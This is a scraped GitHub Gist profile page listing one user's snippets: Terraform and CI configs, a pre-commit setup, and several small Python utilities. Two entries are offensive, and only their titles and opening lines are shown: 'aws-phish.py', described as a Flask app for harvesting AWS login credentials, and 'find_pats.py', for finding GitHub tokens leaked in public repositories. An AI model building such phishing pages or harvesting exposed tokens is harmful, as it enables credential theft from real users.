Terraform is a powerful tool for managing infrastructure as code. However, like any tool, Terraform has its own set of best practices that you should follow to ensure that your infrastructure is secure, reliable, and maintainable. This guide provides opinionated recommendations for Terraform best practices based on CloudPosse and HashiCorp guidance.
RoseSecurity
/ Terraform_Best_Practices.md
Created
August 13, 2024 16:07
RoseSecurity
/ .gitlab-ci.yml
Created
June 20, 2024 19:33
Scan your IaC repositories using this nifty GitLab CI Pipeline for identifying Terraform misconfigurations and vulnerabilities
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| stage: | |
| - test | |
| trivy: | |
| stage: test | |
| image: docker:stable | |
| services: | |
| - name: docker:dind | |
| entrypoint: ["env", "-u", "DOCKER_HOST"] | |
| command: ["dockerd-entrypoint.sh"] |
RoseSecurity
/ .pre-commit-config.yaml
Created
March 22, 2024 14:40
Validate JSON, clean up markdown, eliminate trailing whitespace, detect secrets, and format Terraform with this Pre-Commit hook!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| repos: | |
| # pre-commit install --hook-type pre-push | |
| - repo: https://github.com/pre-commit/pre-commit-hooks # Generic review/format | |
| rev: v4.4.0 | |
| hooks: | |
| - id: check-json | |
| - id: detect-private-key | |
| - id: end-of-file-fixer | |
| - id: no-commit-to-branch | |
| args: ["--branch", "master"] |
RoseSecurity
/ kubernetes-api-deprecation.yml
Created
February 23, 2024 20:12
A GitLab CI Pipeline for discovering deprecated Kubernetes APIs inside of repository manifest files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kubernetes-api-deprecation: | |
| image: | |
| name: golang:1.22-bookworm | |
| variables: | |
| KUBERNETES_TARGET_VERSION: "1.27" | |
| before_script: | |
| - apt-get update && apt-get install -y git | |
| script: | |
| - git clone https://github.com/doitintl/kube-no-trouble.git | |
| - cd kube-no-trouble/ |
RoseSecurity
/ aws-phish.py
Created
February 4, 2024 02:04
An AWS Flask phishing application for harvesting credentials from mobile and desktop device logins.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from flask import Flask, render_template, request, redirect | |
| import os | |
| # AWS Flask phishing application for harvesting credentials from mobile and desktop device logins. | |
| # For the application to work, place the index.html file the templates directory and the style.css file in the static directory | |
| app = Flask(__name__) |
RoseSecurity
/ summarizer.py
Last active
February 3, 2024 23:45
Don't have time to watch tutorials and technical videos? Need to quickly identify useful information? This script harnesses machine learning to summarize YouTube videos.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os | |
| import argparse | |
| import whisper | |
| from pytube import YouTube | |
| from transformers import pipeline | |
| # Harness machine learning to summarize YouTube video transcriptions |
RoseSecurity
/ ercot_wind_production.py
Created
January 5, 2024 14:12
A utility for visualizing ERCOT wind production across north, south, west, and system-wide resources.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import urllib.request | |
| from datetime import datetime, timedelta | |
| import json | |
| import matplotlib.pyplot as plt | |
| from matplotlib.dates import DateFormatter | |
| # Reference: https://apiexplorer.ercot.com/api-details#api=pubapi-apim-api&operation=getData_14 |
RoseSecurity
/ ttfb.py
Last active
December 19, 2023 18:38
Measure the Time To First Byte (TTFB) of a website by DNS lookup, TCP connection, SSL connection, and document HTTP request.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests | |
| import time | |
| # Measure the Time To First Byte (TTFB) of a website by DNS lookup, TCP connection, SSL connection, and document HTTP | |
| # request. | |
| # Reference: https://www.debugbear.com/docs/metrics/time-to-first-byte | |
RoseSecurity
/ find_pats.py
Created
December 7, 2023 19:06
A down and dirty script for finding GitHub PATs in public repositories
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # Run script from command line via python3 find_pats.py | |
| import click | |
| import datetime | |
| import time | |
| from github import Github |
RoseSecurity
/ packer_fmt.yml
Created
November 19, 2023 04:29
A GitHub Action for establishing which HCL directories have been modified, setting up Packer, and running packer fmt against the templates
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Packer Format | |
| on: | |
| pull_request: | |
| types: [opened, synchronize] | |
| paths: | |
| - '**/*' | |
| permissions: | |
| contents: read | |
| pull-requests: write |